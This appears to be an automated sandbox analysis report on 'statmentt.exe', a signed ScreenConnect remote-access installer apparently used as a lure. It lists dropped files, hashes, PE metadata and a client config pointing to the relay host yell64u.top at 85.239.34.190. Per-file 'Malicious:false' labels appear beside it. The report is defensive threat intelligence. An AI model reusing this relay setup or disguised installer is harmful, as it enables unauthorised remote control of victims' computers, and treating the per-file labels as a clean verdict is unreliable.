                                                                                            SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                            MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                            SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                            SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                            SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                            Malicious:false
                                                                                            Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):432221
                                                                                            Entropy (8bit):5.37517317223772
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauW:zTtbmkExhMJCIpErP
                                                                                            MD5:C1F957C64CB829A7B7B4A353E95C6F07
                                                                                            SHA1:FB8FE9AB76BE905694E331119494B486D3E35B26
                                                                                            SHA-256:FC4E019236C62E8DC19CD31129A20D8270F614EF071F8266E49D3897B3D2A7EC
                                                                                            SHA-512:8FA1B4E7C2FCB2D8E212110E5AAD87E41F12FC86CAD47A4E6721FBF6BFFCFB28AD06D5C13DB07760E5627D66CB3D3A668EAA080DB7FB96514F1E8DAD14F2019B
                                                                                            Malicious:false
                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):556
                                                                                            Entropy (8bit):5.044514242750178
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiiUgQv/vXbAa3xT:2dL9hK6E46YP67V3vH
                                                                                            MD5:4A2EA206D76A01F69F353277EE798DCD
                                                                                            SHA1:226946F88022B677666B506BC3CAB283E5638DB4
                                                                                            SHA-256:87727217583916FCE19E1538EBF26428E593BFDD01F34052A01F36644553E2E8
                                                                                            SHA-512:314AE5F3A396A3525C7844B9530FA726A4F134EC12A83172905BF0A1C1B659295F5A09A4B43750017F2780B1D21C5BD261119CEC6141B8C6872F9994E07A3662
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-19%2f12%2f2024%2016%3a29%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):556
                                                                                            Entropy (8bit):5.044514242750178
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiiUgQv/vXbAa3xT:2dL9hK6E46YP67V3vH
                                                                                            MD5:4A2EA206D76A01F69F353277EE798DCD
                                                                                            SHA1:226946F88022B677666B506BC3CAB283E5638DB4
                                                                                            SHA-256:87727217583916FCE19E1538EBF26428E593BFDD01F34052A01F36644553E2E8
                                                                                            SHA-512:314AE5F3A396A3525C7844B9530FA726A4F134EC12A83172905BF0A1C1B659295F5A09A4B43750017F2780B1D21C5BD261119CEC6141B8C6872F9994E07A3662
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-19%2f12%2f2024%2016%3a29%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1590
                                                                                            Entropy (8bit):5.363907225770245
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                            MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                            SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                            SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                            SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):0.23279667478543342
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:AGRDBAduNS3qcq56AduNSiA1dZq+ommXrz4UVRosrzHwyuJ9pE:flxpYf6dwLmm34eru
                                                                                            MD5:FA809988D848F8184162E937481289E4
                                                                                            SHA1:6364D4ADB23EA4C8EB009B03857726A910D9C11B
                                                                                            SHA-256:5663C3889B7E7935D077749A10A00EAEB0980176B770366CA68CFD24B807D00F
                                                                                            SHA-512:5235C13B27197319E2B15A03CCAE1E718355B7F9C58F72D8C3CF4CE1F39DEE31509ECD5D78B53FA74C06783C471FAF29D0BECD747930024172D0BD22E0DF40AF
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):32768
                                                                                            Entropy (8bit):1.4175101841856552
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
                                                                                            MD5:CF63184C2D8E55006E1C6FB521F26C5A
                                                                                            SHA1:A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
                                                                                            SHA-256:A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
                                                                                            SHA-512:499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):32768
                                                                                            Entropy (8bit):0.06926595183858525
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOzOVsnq69GyVky6l3X:2F0i8n0itFzDHFi6nq+E3X
                                                                                            MD5:FC67E3713EC7722E3B0FA16D60249A5E
                                                                                            SHA1:3CA1CB744384C7B903D67F0655E065D319428761
                                                                                            SHA-256:85C08858214E6F9E59494EA6193C7F8D1F5974FD290681A8A1A2E29DEADB6990
                                                                                            SHA-512:4BBDD9D31F70ACD683D5B2DAA7638543BCDEF5DDA3645DC72EAA8076C7CACA749BD245ACEA66AE05D4D38D70E2FDEDF5412446842F3E5BB6840F482481880804
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.796581217563304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
                                                                                            MD5:CC2ADC2329B5D81AE3EDBAB92BACB16B
                                                                                            SHA1:D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
                                                                                            SHA-256:3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
                                                                                            SHA-512:0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):32768
                                                                                            Entropy (8bit):1.4175101841856552
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
                                                                                            MD5:CF63184C2D8E55006E1C6FB521F26C5A
                                                                                            SHA1:A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
                                                                                            SHA-256:A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
                                                                                            SHA-512:499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.796581217563304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
                                                                                            MD5:CC2ADC2329B5D81AE3EDBAB92BACB16B
                                                                                            SHA1:D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
                                                                                            SHA-256:3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
                                                                                            SHA-512:0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):32768
                                                                                            Entropy (8bit):1.4175101841856552
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
                                                                                            MD5:CF63184C2D8E55006E1C6FB521F26C5A
                                                                                            SHA1:A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
                                                                                            SHA-256:A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
                                                                                            SHA-512:499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.4294865097622065
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:statmentt.exe
                                                                                            File size:5'652'448 bytes
                                                                                            MD5:054251d2e1de783b0faed842d64fd893
                                                                                            SHA1:3e23d7c2777644dbe519b365d5e9cb80bfe3d402
                                                                                            SHA256:e1a3eb6e1ec31406443bfbe5067c1852706406a824a29c2490c8e1b73fcf0081
                                                                                            SHA512:480dfb06bc061d908962365eb66e1ded4f064b4f825190102d5f0a30458837e18d81e552098d519a08bbb92fb545fd675f1d3a3de38574707d0740c54dba32c3
                                                                                            SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoi:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                            TLSH:6C46E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x4014ad
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                            Signature Valid:true
                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                            Signature Validation Error:The operation completed successfully
                                                                                            Error Number:0
                                                                                            Not Before, Not After
                                                                                            • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                            Subject Chain
                                                                                            • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                            Version:3
                                                                                            Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                            Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                            Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                            Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                            Instruction
                                                                                            call 00007F44F056D75Ah
                                                                                            jmp 00007F44F056D20Fh
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push 00000000h
                                                                                            call dword ptr [0040D040h]
                                                                                            push dword ptr [ebp+08h]
                                                                                            call dword ptr [0040D03Ch]
                                                                                            push C0000409h
                                                                                            call dword ptr [0040D044h]
                                                                                            push eax
                                                                                            call dword ptr [0040D048h]
                                                                                            pop ebp
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 00000324h
                                                                                            push 00000017h
                                                                                            call dword ptr [0040D04Ch]
                                                                                            test eax, eax
                                                                                            je 00007F44F056D397h
                                                                                            push 00000002h
                                                                                            pop ecx
                                                                                            int 29h
                                                                                            mov dword ptr [004148D8h], eax
                                                                                            mov dword ptr [004148D4h], ecx
                                                                                            mov dword ptr [004148D0h], edx
                                                                                            mov dword ptr [004148CCh], ebx
                                                                                            mov dword ptr [004148C8h], esi
                                                                                            mov dword ptr [004148C4h], edi
                                                                                            mov word ptr [004148F0h], ss
                                                                                            mov word ptr [004148E4h], cs
                                                                                            mov word ptr [004148C0h], ds
                                                                                            mov word ptr [004148BCh], es
                                                                                            mov word ptr [004148B8h], fs
                                                                                            mov word ptr [004148B4h], gs
                                                                                            pushfd
                                                                                            pop dword ptr [004148E8h]
                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                            mov dword ptr [004148DCh], eax
                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                            mov dword ptr [004148E0h], eax
                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                            mov dword ptr [004148ECh], eax
                                                                                            mov eax, dword ptr [ebp-00000324h]
                                                                                            mov dword ptr [00414828h], 00010001h
                                                                                            Programming Language:
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 build 21022
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x1dde0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                                            FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                                            FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                                            FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                                            FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                            RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                            DLLImport
                                                                                            mscoree.dllCorBindToRuntimeEx
